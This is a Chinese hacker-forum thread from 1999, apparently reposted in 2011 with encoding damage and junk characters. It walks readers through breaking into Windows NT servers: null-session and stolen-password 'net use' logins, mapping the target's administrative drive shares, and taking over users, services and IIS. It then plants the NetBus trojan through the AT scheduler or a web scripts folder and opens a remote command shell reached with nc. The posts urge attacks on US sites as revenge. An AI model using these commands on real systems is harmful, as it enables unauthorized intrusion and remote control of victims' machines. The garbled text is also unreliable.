《版主頁(yè)黑客工具和文章的幾個(gè)問(wèn)題》中提到:, w& I* h) M& i
請(qǐng)教���,從版主頁(yè)上載得PINGER���,GRINDER,LETMEIN等��,卻不能用,PINGER安裝后����,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER��。EXE����,40多K,運(yùn)行PINGER�,設(shè)置好IP,點(diǎn)PING��,彈出一個(gè)窗口(C++���。�。�。),說(shuō)出錯(cuò)�,然后關(guān)閉了���,何故�,是不是安裝有誤? 2����。運(yùn)行LETMEIN,彈出以下錯(cuò)誤:連接文件LETMEIN�����。EXE到不存在的NETAPI32��。DLL�;NETGROUPGETUSERS。 是否說(shuō)明需要NETAPI32���。DLL文件�����,哪里有該DLL��。 3�。USAKILLER 的教學(xué)文章中提到需在WINNT4����。0下運(yùn)行以下步驟等�����,是否要求我的操作系統(tǒng)也是WINNT4����。0 ����,應(yīng)該不是吧? 4���。NC FOR NT 是否要求我的操作系統(tǒng)為NT���,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問(wèn)題需高手回答���,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用��,實(shí)在窩囊哦���, 強(qiáng)烈建議USAKILLER 等高手級(jí)的黑客寫更多的教學(xué)文章,以提高我國(guó)黑客水平。
' w$ T9 u/ R0 Q! y> 我的機(jī)子MMX166��,WIN98�,2��。5G����,32M內(nèi)存。1 t" a, c. @3 S
- {& C5 ]' f% Y' a) a+ ^黑客并不神秘�����,你只要了解操作系統(tǒng)�,學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn),輔助相關(guān)的工具�,就可以成功。9 b4 U* p8 }4 o7 A
你的問(wèn)題是�����,pinger, grinder, letmein等工具必須要在NT上運(yùn)行���,我們強(qiáng)烈建議�����,你一定要安裝NT����,對(duì)于你的機(jī)器配制,和我們現(xiàn)在差不多�����,只是比你多了32M內(nèi)存���,2G硬盤��。
& l+ `6 s3 b" w( H9 n1 [( d其實(shí)�,攻擊敵站���,利用其操作系統(tǒng)本身的工具就可以了���,比如,我們?cè)贜T上攻擊某服務(wù)器��,該服務(wù)器為NT4.0��,我們將做如下簡(jiǎn)單事情就有可能成功,假設(shè)目標(biāo)NT的IP地址為111.111.111.111����,做法如下:* M9 L- N/ f. s/ b# q
net use \\111.111.111.111\ipc$ "" /user:""" M, c' Q7 y8 i" h, d7 x2 q
net.exe是NT的工具文件,該命令將和目標(biāo)服務(wù)器建立Null Session���,如果成功,你可以查看該服務(wù)器上的共享目錄:
: P8 Z) I+ s- Y; v* N& ? u' dnet view \\111.111.111.111
, E3 i% D1 n/ k) g: u) B當(dāng)然��,如果你有該NT管理員密碼�����,就更好辦了���,假設(shè)其管理員Admin密碼為fuck:1 F' l5 k& d; j4 F- k
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"/ Z$ O& V0 @* ^
命令成功后���,幾乎所有目標(biāo)NT上的配制,資源����,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來(lái)查看或修改:( k$ }$ Z$ [% `9 o% S! |
1、查看或修改遠(yuǎn)程機(jī)器上的硬盤����,假如目標(biāo)NT上有C����、D兩個(gè)硬盤:* J% y% i( x9 h9 a5 L$ L6 E
net use x: \\111.111.111.111\c$
& w5 O/ M: w$ }0 inet use y: \\111.111.111.111\d$# C% P( L* n0 H" d) o) }
這樣��,目標(biāo)NT上的C�����、D盤分別被影射為你本地的X�、Y盤,你想怎么做都可以...
3 o u2 b( Z+ M# O2���、管理目標(biāo)NT的用戶:) I, s5 o7 `: @ p/ _7 K. X
從“開(kāi)始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
T/ h4 U/ m# ~* Z& c/ K9 ^鍵入\\111.111.111.111后�����,目標(biāo)NT上的所有用戶你想怎么做都可以�����,和管理你本地的一樣, K9 e& w5 \& U8 s2 F9 j( `
3���、管理目標(biāo)NT的服務(wù)
7 ~( y8 g0 N5 Z選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”
5 l% K& P2 A+ ^6 O9 p9 k8 }. M- r$ C" w這樣你可以管理目標(biāo)NT上的服務(wù)���,共享目錄2 f, p( A- @: S; y: ~. Q0 _7 W" }
4、IIS管理
, ], E' S& K3 |6 K選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111- Z2 p; O$ x7 ]2 H/ {
目標(biāo)NT的FTP����、WWW服務(wù)你就可以重新配置! `6 [9 y( Z( y3 g
5、事件管理" U+ b l, o2 z* r7 z) g6 r" ?
“事件查看器”->連接到服務(wù)器->111.111.111.111& Y2 h1 @7 Y# O" _
- G0 k0 O2 c9 Z* o還有更多的東西�,都可以用NT本身的功能來(lái)完成,這些都是95, 98所不能實(shí)現(xiàn)的�。
* @! e$ g1 J- E8 K; _8 C) _$ f
) Z3 E9 o5 g+ y6 H! e* h! p9 C$ C當(dāng)然���,98,95也能做一些事情����,但很麻煩�,比如:: _5 w. `6 w/ n$ U/ {7 l" g
net use \\111.111.111.111\ipc$
6 z2 L* q( T( B( s9 ]net use z: \\111.111.111.111\d$ W4 n5 u2 r; `- y3 f% i
但其后不能帶參數(shù),即改用其他用戶或密碼�,系統(tǒng)將用當(dāng)前用戶和密碼去登錄,如果你知道目標(biāo)NT的用戶或密碼�����,重新啟動(dòng)95, 98�����,改用該用戶和密碼登錄,方可實(shí)現(xiàn)��,你可以連接目標(biāo)NT上的共享資源�,但不能進(jìn)行管理,如用戶�����、事件等
6 T0 R$ b* u1 Y& y' h! b2 h+ a+ h$ D' T: f+ O4 d; p/ a r0 B" m
我們強(qiáng)烈建議各位有心要為死難者報(bào)仇���,真正的想黑霉國(guó)的站點(diǎn)��,花點(diǎn)時(shí)間�����,裝個(gè)NT吧�����,NT Workstation也可以����!/ W& {$ ?; T, x0 \1 v: T) p
這樣,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用�����!
6 @4 X4 A9 x/ a8 C
: Y3 d: k* G( }, z7 L/ L! a2 D+ J; u+ ]
--------------------------------------------------------------------------------
+ F) U+ {7 O- F& A6 [% M
, K0 j4 D( w- S4 L9 [/ |2 J4 q' X>quack于1999-06-12�,23:37:44) @3 v, ^6 i. P7 R& k
在大作《幾個(gè)有關(guān)黑的問(wèn)題》中提到:+ ^) N' D4 |+ O( C
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒(méi)有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無(wú)此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無(wú)機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無(wú)法登陸?再有,假定我上傳了CIH,對(duì)了,CIH對(duì)NT暫時(shí)無(wú)效,假定上傳其它"有益"美國(guó)NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國(guó)機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國(guó)鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說(shuō)一句,我還真干掉了幾個(gè)美國(guó)人,哈!。" @9 `) g0 g1 r: M) u
2 @$ i! c; j3 M0 s/ Q/ A4 jkillusa于1999-06-13�����,03:25:15
! d5 R2 V. ~! V2 l# g在大作《Re: 幾個(gè)有關(guān)黑的問(wèn)題》中提到:
' c3 F' {4 @7 J; |9 n+ M% \% W
0 k% o6 t7 K$ _9 o g7 Mletmein.exe 暫時(shí)沒(méi)有mypwd參數(shù)�,十分抱歉6 e/ M0 w- O: I5 o, F
pinger程序,只是利用ping來(lái)尋找主機(jī)�,每臺(tái)NT服務(wù)器有一個(gè)主IP地址���,但也可以設(shè)置多個(gè)輔助IP地址�,比如有些服務(wù)器供應(yīng)商����,一臺(tái)NT服務(wù)器上可以設(shè)置一千多個(gè)IP,每個(gè)IP對(duì)應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址�,就是該主機(jī)的主IP地址,所以有時(shí)顯示只有IP����,而無(wú)主機(jī)名�����。另外���,有些服務(wù)器是非NT的操作系統(tǒng),有時(shí)將不會(huì)顯示主機(jī)名���。當(dāng)然�����,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置�,也會(huì)出現(xiàn)上面的情況����。
6 u5 d' a5 T0 f4 L2 S; C1 i7 Z( B5 `7 a! J8 }
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序,所以����,netbus.exe是不用上傳的,只需在目的6 i* s: Y! G$ K6 W6 |
服務(wù)器上運(yùn)行ntsrv.exe����,而在目的服務(wù)器運(yùn)行該程序有很多種方法:
3 x0 ^3 g4 Z; C* [3 M& C. I- ~' B0 a, x( @% S
1��、利用服務(wù)器的 Schedule 服務(wù)來(lái)啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序���,具體使用方法,可在自己的NT Dos窗口下鍵入以下:+ l+ {# E" ~/ A$ \" F
4 b l" H* U! O0 T/ _' h
C:\>net start schedule& s8 {) H0 f% Z K
Schedule 正在啟動(dòng)服務(wù).....
) k2 D+ t# b) I! RSchedulw 服務(wù)啟動(dòng)成功�。
$ l+ H) t* z* Y$ Q, ]: W% T( _1 bC:\>at /?4 j! H3 K' A, ^& N
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序。! R+ A3 \* |" ]8 n) ]0 J5 B8 m$ O# _ K0 h
運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)�。 `8 R' O7 t7 [" D
. q5 @5 }2 I1 C5 S. bAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
) T6 v/ N7 a) i) a# K% ~AT [\\computername] time [/INTERACTIVE], c! Q# `0 \. v; `0 E
[ /EVERY:date[,...] | /NEXT:date[,...]] "command") J$ B- X. s7 j% [9 B Z
5 H1 l# o. s# N: O\\computername 指定遠(yuǎn)程計(jì)算機(jī)。 如果省略這個(gè)參數(shù)
+ j) a- c6 N8 T% k" V& z. D8 k命令會(huì)被排定在本機(jī)上運(yùn)行����。( v5 D) \) a* T) J" w- j$ ?# H
id 指定給排定進(jìn)度命令的識(shí)別號(hào)。3 K0 q$ A5 x( u$ l+ R1 v
! W: A' ? \6 s* i" q2 K; |/delete 刪除某個(gè)已排定進(jìn)度的命令��。如果省略標(biāo)識(shí)��,計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除�����。3 D# D& M3 {' | o1 ]
/yes 用于刪除所有作業(yè)���,且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 ��。
2 A* A: R$ D( L$ x, z4 Ztime 指定命令運(yùn)行的時(shí)間���。' O* l+ s; w' r" F1 U; c7 l
/interactive 允許作業(yè)在運(yùn)行時(shí),與用戶通過(guò)桌面交互��。" {0 c0 i5 y$ B9 }* [1 |. v
. v" C+ S$ c# p3 F& k0 `' r/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令����。
2 M/ I1 q& b8 D6 w: R如果省略日期,則默認(rèn)為在每月的本日運(yùn)行�。1 c/ i4 M* I4 V4 W% i' i& X
5 R) d" f- F1 g7 _; h/next:date[,...] 指定在下一個(gè)指定日期 (如,下周三)���,運(yùn)行命令�����。如果省略日期���,則默認(rèn)為在每月的本日運(yùn)行。
. l: K! I& w9 O( s N( b4 w [3 T7 L s
"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件���。2 I- C0 X: ?1 |9 w7 ]2 u
& y! r j9 Z3 r; u4 J
C:\>
/ ]2 x& E# M, p+ x. m1 C$ Q1 v4 p& E) G- o9 ?
知道了如何使用AT�,再來(lái)看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:3 A& K, W7 Y1 c; |9 T% }- ~
1 利用管理員登陸到目的服務(wù)器,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"' Q' [! L' y- n8 d1 D( x2 x" I+ _
2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
. J, l/ b$ z, J3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行����,當(dāng)然最快運(yùn)行最理想,所以�,你可以用letmein.exe得到服務(wù)器的時(shí)間,然后:
: {6 \4 l0 {" \4 \3 Nat \\x.x.x.x 00:00 ntsrv.exe /port:64321
b D+ d0 t' ]其中00:00要改為用letmein.exe得回來(lái)的具體時(shí)間+一點(diǎn)容量��,等一會(huì)后�,再在本地啟動(dòng)netbus.exe,鍵入目的服務(wù)器得ip地址或hostname���,連接�!具體使用可參照 "How to get in nt"���,比如第一種方法�����,你想要在目的服務(wù)器運(yùn)行 LEGION����,可以利用netbus得上傳功能�,將LEGION上傳至目的服務(wù)器,再用netbus的"Start program"�,鍵入完整路徑的LEGION運(yùn)行程序,就ok了��!第二種方法是利用netbus的“App redirect”功能�,啟動(dòng)遠(yuǎn)程telnet服務(wù),如下:在netbus中擊“App redirect”����,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321��,服務(wù)就啟動(dòng)了�����,然后在本地運(yùn)行:nc x.x.x.x 4321��,出現(xiàn)dos啟動(dòng)的畫面就表示連接成功:# i" n* V/ T9 |
Microsoft(R) Windows NT(TM)
0 V0 {. r* A) Q, R/ _" x(C) Copyright 1985-1996 Microsoft Corp.& L; `2 L5 q) d4 z& W
C:\>
& h2 y5 U" L) D! i
9 d o: X# K$ E m E+ B: {8 e2�����、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器2 t* `) s3 \& Z4 y6 a# z
9 C1 C4 y# Y* C, B% J5 A將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄�,如cgi-bin或scripts,然后在瀏覽器鍵入url如:3 F$ M+ G' |) d! C' n! |& ^
http://x.x.x.x/scripts/ntsrv.exe /port:64321
/ E N) u2 A% K+ t或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
2 g7 W, f; K* [5 Z: R' l% x該程序就啟動(dòng)了
' o' M* ~) @% L: ^* I" r3 q- p7 D- P3 y0 O# f
我只提這幾中方法!
" Y& ^) N8 u/ Y8 d* U- f2 F要成功�����,必須打好基礎(chǔ)工����,對(duì)操作系統(tǒng)充分了解! {8 p& |* x6 ]( `7 j+ I
( h. U% ^4 E I4 w1 o
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡